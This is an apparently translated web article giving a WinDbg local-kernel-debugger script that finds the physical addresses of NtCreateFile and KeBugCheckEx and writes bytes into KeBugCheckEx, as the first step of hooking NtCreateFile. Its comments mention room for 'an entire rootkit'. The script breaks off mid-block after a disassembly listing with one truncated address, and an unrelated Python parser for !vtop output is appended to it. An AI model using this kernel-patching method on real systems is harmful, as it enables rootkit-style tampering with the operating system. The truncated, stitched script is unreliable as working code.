
Using the WinDbg local kernel debugger to break into the Windows kernel

Source: compiled by this site  Author: Anonymous  Date: 2017-09-26
Jmpkernel_hookcreatefile.wdbg:
.load kext.dll
.load kdexts.dll
.block
{
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 $$ Get the Physical Address of NtCreateFile
 $$
 $$ get the address of nt!NtCreateFile
 ? nt!NtCreateFile
 $$ @$exp contains the address of NtCreateFile, so we create an alias for it
 aS /x va @$exp
 
 .block
 {
   $$ get the physical address of NtCreateFile
   !vtop 0 va
   $$ parse the results of vtop
   r @$t1 = 0
   .foreach (tok { !vtop 0 va })
   {
     .catch
     {
       $$ .foreach substitutes the token text even inside the string, so this echoes every token
       .printf "tok"
       .printf "\n"
       .if(@$t1==1)
       {
         r @$t1 = ${tok}
         .break
       }
 
       $$ in the results of vtop, when we find "phys" token, after it, it comes the physical address
       .if($spat("${tok}","phys"))
       {
         r @$t1 = 1
       }
     }
   }
 }
 ad va
 
 $$ after parsing the vtop results the physical address is in @$t1; create an alias for it
 aS /x phaNtCreateFile @$t1
 
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 $$ Get the Physical Address of KeBugCheckEx
 $$
 $$ get the address of nt!KeBugCheckEx
 ? nt!KeBugCheckEx
 $$ @$exp contains the address of KeBugCheckEx, so we create an alias for it
 aS /x va @$exp
 
 .block
 {
   $$ get the physical address of KeBugCheckEx
   !vtop 0 va
   $$ parse the results of vtop
   r @$t1 = 0
   .foreach (tok { !vtop 0 va })
   {
     .catch
     {
       .printf "tok"
       .printf "\n"
       .if(@$t1==1)
       {
         r @$t1 = ${tok}
         .break
       }
 
       $$ in the results of vtop, when we find "phys" token, after it, it comes the physical address
       .if($spat("${tok}","phys"))
       {
         r @$t1 = 1
       }
     }
   }
 }
 ad va
 
 $$ after parsing the vtop results the physical address is in @$t1; create an alias for it
 aS /x phaKeBugCheckEx @$t1
 
 
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 $$ Write our code to KeBugCheckEx (we use the memory of this function because it won't be called unless
 $$ the system crashes)
 $$
 
 .block
 {
   .printf "nt!NtCreateFile physical address %p\n", phaNtCreateFile
   .printf "nt!KeBugCheckEx physical address %p\n", phaKeBugCheckEx
 
   $$ now we are going to write our code to KeBugCheckEx. It's only some simple nops operations for the PoC,
   $$ but we could find enough space to write an entire rootkit
 
   $$ !eb (kdexts) writes bytes to physical memory, so the patch goes in via the physical address found above
   !eb phaKeBugCheckEx 90 90 90 90 90 90 90 90
   $$ Now lets see the code of nt!NtCreateFile in the target system (win 8.1 x64 ntoskrnl version is 6.3.9600.17668)
   $$
   $$ nt!NtCreateFile:
   $$ fffff803f846020 4c8bdc mov r11,rsp
   $$ fffff803f846023 4881ec88000000 sub rsp,88h
   $$ fffff803f84602a 33c0 xor eax,eax
   $$ fffff803f84602c 498943f0 mov qword ptr [r11-10h],rax
   $$ fffff803f846030 c744247020000000 mov dword ptr [rsp+70h],20h
   $$ fffff803f846038 89442468 mov dword ptr [rsp+68h],eax
   $$ fffff803f84603c 498943d8 mov qword ptr [r11-28h],rax
   $$ fffff803f846040 89442458 mov dword ptr [rsp+58h],eax
   $$ fffff803f846044 8b8424e0000000 mov eax,dword ptr [rsp+0E0h]
   $$ fffff803f84604b 89442450 mov dword ptr [rsp+50h],eax

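Most of the script above is spent parsing `!vtop` output with a `.foreach` token scan. The following Python is an added example, not part of the article, that reproduces that scan offline on constructed `!vtop` text so a reviewer can see exactly what ends up in `@$t1`, and shows a second parser keyed on the summary line that tolerates the backtick separator and trailing period the bare token scan would trip on. The sample outputs and their addresses are made up for the test.

```python
import re
from typing import Optional

# Constructed sample of "!vtop 0 <va>" output for a 4 KiB-mapped x64 page.
# Values are invented for this example; they are not taken from the article.
SAMPLE_VTOP_4K = """\
Amd64VtoP: Virt fffff803`f8460200, pagedir 1aa000
Amd64VtoP: PML4E 1aaf80
Amd64VtoP: PDPE 1abff0
Amd64VtoP: PDE 1ac3e0
Amd64VtoP: PTE 1ad300
Amd64VtoP: Mapped phys 2460200
Virtual address fffff803f8460200 translates to physical address 2460200.
"""

# Constructed sample for a large-page mapping (no PTE line, different wording).
SAMPLE_VTOP_LARGE = """\
Amd64VtoP: Virt fffff803`f8460200, pagedir 1aa000
Amd64VtoP: PML4E 1aaf80
Amd64VtoP: PDPE 1abff0
Amd64VtoP: PDE 1ac3e0
Amd64VtoP: Large page mapped phys 2460200
Virtual address fffff803f8460200 translates to physical address 2460200.
"""


def parse_vtop_token_scan(output: str) -> Optional[int]:
    """Mirror of the script's .foreach loop: walk whitespace tokens and, once a
    token equal to "phys" is seen, take the next token as the physical address
    (WinDbg's default radix is 16, so `r @$t1 = 2460200` means 0x2460200)."""
    tokens = output.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok == "phys":  # $spat("${tok}","phys") is an exact match here
            return int(tokens[i + 1].rstrip("."), 16)
    return None


_SUMMARY = re.compile(r"translates to physical address\s+([0-9a-f`]+)\.?", re.I)


def parse_vtop_summary(output: str) -> Optional[int]:
    """Alternative keyed on the final summary line instead of a bare token,
    stripping the backtick separator and trailing period that would break a
    naive `r @$t1 = ${tok}` assignment."""
    m = _SUMMARY.search(output)
    return int(m.group(1).replace("`", ""), 16) if m else None
```

Both parsers return `None` when the translation is absent, which is the case the script's `.catch` silently swallows while leaving `@$t1` at 0 or 1 and the later `!eb` pointed at a bogus physical address.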